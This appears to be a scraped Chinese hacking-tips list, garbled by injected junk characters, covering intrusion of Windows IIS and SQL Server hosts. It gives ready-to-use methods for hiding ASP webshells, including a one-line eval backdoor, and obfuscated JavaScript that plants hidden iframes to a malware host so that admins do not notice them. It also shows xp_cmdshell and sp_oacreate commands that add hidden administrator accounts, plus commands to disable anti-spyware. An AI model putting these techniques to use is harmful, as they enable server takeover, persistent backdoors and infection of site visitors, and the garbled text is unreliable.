0 n2 f; r% ~6 I% T: Y ~执行后可以用AT命令查看新加的任务! n' `$ x$ m6 o5 } i
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 ?% _# z4 Z t9 r" {4 B
) c, f) O) C6 j" g1 [53、隐藏ASP后门的两种方法3 R6 a" E4 {7 G4 j. I \1 K
1、建立非标准目录:mkdir images..\
5 U3 b' G% e. a9 Z2 N拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* B% u6 p( m% u/ l$ U( p# P7 Y
通过web访问ASP木马:http://ip/images../news.asp?action=login. ~+ o( p- o6 q' [/ {
如何删除非标准目录:rmdir images..\ /s- h, o0 e3 x/ b+ r( p' D7 h5 g
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:4 |9 b; \5 z/ E
mkdir programme.asp
( y6 ]" t2 `. o6 _' r+ w新建1.txt文件内容:<!--#include file=”12.jpg”-->6 d# n& Y9 B( V, E+ y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
) G6 D2 u! z" [ c6 S1 V& Dattrib +H +S programme.asp% U9 \$ V9 [. \- v v- i# K7 }2 P7 Z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, |; j7 E. Q% s( C$ o
9 _6 i# h+ q, Y0 K1 U54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! Z: f9 D9 p& N) F
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 R% }) B: o! j& j3 [" {+ f* U
$ J1 Z! C5 D) V2 l: V# d* \55、JS隐蔽挂马
2 f# ^* V M7 s9 p1.2 o) K7 W' X0 c9 f: [; `
var tr4c3="<iframe src=ht";
3 O3 g9 L# B5 [& w0 Rtr4c3 = tr4c3+"tp:/";
1 ?0 M- T. `$ G! u( ]tr4c3 = tr4c3+"/ww";" X' [( ^' g4 \0 G7 @
tr4c3 = tr4c3+"w.tr4";
; A9 w4 }0 I6 R3 q, @: [tr4c3 = tr4c3+"c3.com/inc/m";
( e5 \' }2 e: h+ v7 u! [tr4c3 = tr4c3+"m.htm style="display:none"></i";
0 r0 [; B0 ]0 X9 M$ r+ Xtr4c3 =tr4c3+"frame>'";: i" U* ]9 o' T9 _+ Q
document.write(tr4c3);. K {& F! l6 q3 J2 j" R9 [: H
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。4 O( e0 e5 R! p+ }; k8 D
$ T/ o8 N. ^# ]
2.4 t" @* p5 t; L N
转换进制,然后用EVAL执行。如% \/ f; V3 E0 X! b' a5 j
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
- K; } d& o. u8 _+ t2 d; V( z2 G不过这个有点显眼。 C( R( S$ x d1 F) R' `, p. }
3.
- ^. [0 q7 F! `7 j+ n/ t+ o1 D9 K7 v8 Udocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
2 u5 e5 w, t- S" [! N最后一点,别忘了把文件的时间也修改下。5 b g" b% m, [% f6 D/ b* j
# b; n1 T$ C6 y7 U! S56.3389终端入侵常用DOS命令
& {1 b; U3 u+ g, ]$ ktaskkill taskkill /PID 1248 /t
% P5 Z# ` }+ l1 f" o5 [; m& H) _1 q4 O' T
tasklist 查进程* B- z' _5 ?. n3 Y( O; z& n2 f
5 p0 }" T0 P1 M# ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
7 A% l: [$ {$ {$ ?+ Qiisreset /reboot0 D; u6 I }% j' g+ z! a k
tsshutdn /reboot /delay:1 重起服务器$ L4 x" F: B8 }/ S4 p
* @) b' X; i ]
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
( @6 u: r: `$ B" f; I/ U0 ~! c- A
+ _' e. Z W3 P( |7 f5 Pquery user 查看当前终端用户在线情况
* M4 G8 v3 X! X0 @7 v5 a/ @# G( P
要显示有关所有会话使用的进程的信息,请键入:query process *2 Z+ }/ A& }5 n3 I; }* j
) p8 W+ i$ k* G# |9 }
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 Z. u* Z6 U H$ x( ]3 L
G; v$ h& D$ @' ~8 W
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
. ?1 _7 M* i2 j3 c
0 @4 I: i; N1 i* K- K( d& E: u要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
V# U: Z" h# H+ D2 A( M2 G) y5 N$ x. x7 s/ j4 J; z. v7 r
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启, U2 N) a% U4 e( v! v/ [* o
$ I5 m$ ?% |) G1 {4 N
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 O- M: |; h+ H6 _% E) _( c* L9 K; `5 u& F( F h. m( R3 V0 U
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
/ D( g9 v# F; @% [, l) K K! L( ^4 J; V/ G ?
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
! f7 E) D4 y" F' C0 ^8 [3 j; F3 ~$ u* Z: h- E' X
56、在地址栏或按Ctrl+O,输入:7 ]8 w6 ?2 }4 y0 V$ O. I& w3 [/ x+ ~
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 e+ T- M f% b) m/ \* `# }4 O5 ~
2 H+ A7 `. o, r8 z- [- P: W源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。+ v$ Y6 o; s5 b( l8 i0 l
! z% ]5 v8 H% ^8 d) e/ q4 K
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
" f( g) T8 Q& l用net localgroup administrators是可以看到管理组下,加了$的用户的。
. O7 M- F& E8 b* w+ M( P. l$ g o. l
58、 sa弱口令相关命令
+ R$ d' Q. f7 s/ \
2 I, m# O( ^; z+ {$ I一.更改sa口令方法:: h R5 E0 }* n; c- f
用sql综合利用工具连接后,执行命令:3 k% ^, [2 y9 x: |. P( x
exec sp_password NULL,'20001001','sa'
/ V3 t* } E. g! E/ b) e+ T(提示:慎用!)3 f9 H4 _+ {4 Q
/ J6 T8 X: |; d! W3 M* \, Y B二.简单修补sa弱口令.& H3 V; o# S1 D: o: P5 \ h9 ?
5 V* N8 X# i# h
方法1:查询分离器连接后执行:
; O3 u7 K6 h U. X* Lif exists (select * from, U8 D+ l2 [1 k4 m: b' r' _; U5 }
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and, g1 f* g- [5 v+ c2 ]$ Y: }
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)' F, q7 `7 s7 ~1 d
6 x" W4 M( d, r! n0 f
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% k- g, Q$ n, d' |& T2 ?
, Q2 S0 Y0 Z' ?$ L1 M2 Y. K
GO
+ a2 x# K( N" Q/ G2 l% U* f/ W
然后按F5键命令执行完毕5 ?- A! A" }2 @6 d9 U4 [
8 G% ?# H4 P4 ?( E) N方法2:查询分离器连接后8 _& W& ~2 y- N/ v+ |* U
第一步执行:use master- ]9 H! @5 s" K" C1 i, Y+ @5 t g
第二步执行:sp_dropextendedproc 'xp_cmdshell'
) b9 U# V* U0 Z6 b3 L. m5 }7 t+ m然后按F5键命令执行完毕5 p, d* N; ^1 E: w: p2 l( B- c' F
# o2 Z* Y9 }* [" e9 ?
2 v8 M9 d3 }1 N+ H+ ]! z! P三.常见情况恢复执行xp_cmdshell.# c4 {$ {1 L/ X3 y9 j- f
; N: O8 |1 l; N5 V5 p5 ^' G
- ^, Y* |+ `2 |) q4 p( g' [; c0 Z
1 未能找到存储过程'master..xpcmdshell'.$ o+ O- g5 B4 k( i6 I' f
恢复方法:查询分离器连接后,
, s' g1 I6 ?0 K/ n. n% o; H! M6 O, [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int: d* d- M1 ?7 ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 S. P$ K( ^7 P+ T( c然后按F5键命令执行完毕
4 ^+ e- Z. j5 V' D" C! \$ q1 c7 R5 g1 u" ]+ t# v
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)$ H9 Z6 x! H. ? Q v7 g5 P/ h9 N
恢复方法:查询分离器连接后,
0 c5 Y- t8 F+ l第一步执行:sp_dropextendedproc "xp_cmdshell"! u7 }3 ~+ O ]/ q% G6 c" P
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' c7 c, V% L1 x! c! O4 _# b然后按F5键命令执行完毕; B+ N/ L. d0 _
7 @3 E# U. \: w- x: N9 J6 |) Z; s
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 P5 |0 c9 m1 v4 i, L! n: q$ v4 T恢复方法:查询分离器连接后,
" V" v, _: Z# F$ E; ^+ d第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
, D+ P9 l/ a+ Z% M第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
% H$ F! s2 A6 w然后按F5键命令执行完毕9 n7 c1 _9 U2 P" D+ z# s
9 Y+ m3 p- [, o" b7 f四.终极方法.
: j! C b6 ]* h! g' u如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
6 }6 X; x0 p, P; {/ }查询分离器连接后,! H8 E2 x+ N T& W. r- f% s. u4 w
2000servser系统:
3 E$ H: L1 H0 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. |$ I+ a" U, t* m; v/ j8 O, ]8 b) }& M: g Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'- x. @4 H$ x# X
$ s3 J9 r) P9 P' M; w
xp或2003server系统:9 W' F, V7 x! }/ g* @
% d- S$ r9 J3 R4 f9 d) C. M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* |& o" J$ m. ]8 [3 @9 n ?5 k8 z9 g' w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 L+ z7 d9 ?/ M; Q7 Z, D |